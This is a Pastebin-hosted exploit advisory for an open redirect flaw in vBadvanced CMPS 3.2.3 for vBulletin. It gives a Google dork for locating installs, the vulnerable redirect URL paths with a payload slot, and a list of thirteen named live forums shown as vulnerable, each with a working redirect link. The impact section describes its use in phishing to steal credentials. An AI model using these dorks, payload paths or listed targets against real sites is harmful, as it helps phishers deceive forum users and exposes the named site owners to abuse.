Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : vBulletin 3.8.x vBadvanced CMPS v3.2.3 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 01/03/2019
- # Vendor Homepage : vbulletin.com ~ vbadvanced.com
- # Software Download Link : vbadvanced.com/products.php?do=productinfo&productid=4
- # Software Information Link : vietvbb.vn/up/showthread.php?t=66952
- # Software Version : 3.2.3
- # Sofware Technical Requirements :
- vBulletin 3.6.0 - 3.8.x or higher. - PHP 4.0.6 or higher. - MySQL 3.23 or higher is recommended.
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:"Powered by vBadvanced CMPS v3.2.3"
- Powered by vBadvanced CMPS v3.2.3 intext:vBSecurity v2.2.2 (Pro)
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- vBadvanced CMPS (Content Management & Portal System) is an advanced portal / CMS
- that allows you to easily include elements from your vBulletin message board on your web
- site's homepage, or other pages. It's module system (w/ 14 default modules included) makes
- almost every aspect of the software easy to customize and change through your Admin CP.
- Easily create and manage new pages with your own custom content with the ability to change
- every setting on a per-page basis. Integrating CMPS modules with your vBulletin forum
- pages can also be done with no file modifications required.
- ####################################################################
- # Impact :
- ***********
- This web application vBulletin 3.8.x vBadvanced CMPS v3.2.3 accepts a user-controlled
- input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks. An http parameter may contain a URL value and could cause
- the web application to redirect the request to the specified URL. By modifying the URL value
- to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
- Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
- Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page
- user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # Open Redirection Exploit :
- **************************
- /redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
- /forum/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
- /forums/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] parrotforums.com/redirect-to/?redirect=https://cxsecurity.com/
- [+] camarozone.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] coloradofisherman.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] caraudioclassifieds.org/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] techsupportforum.com/forums/redirect-to/?redirect=https://cxsecurity.com/
- [+] labradorforums.co.uk/redirect-to/?redirect=https://cxsecurity.com/
- [+] waltherforums.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] cascadaclub.com/forums/redirect-to/?redirect=https://cxsecurity.com/
- [+] chicagolandfishing.com/forums/redirect-to/?redirect=https://cxsecurity.com/
- [+] dendroboard.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] insightcentral.net/forums/redirect-to/?redirect=https://cxsecurity.com/
- [+] chicagolandfishing.com/forums/redirect-to/?redirect=https://cxsecurity.com/
- [+] germanshepherds.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment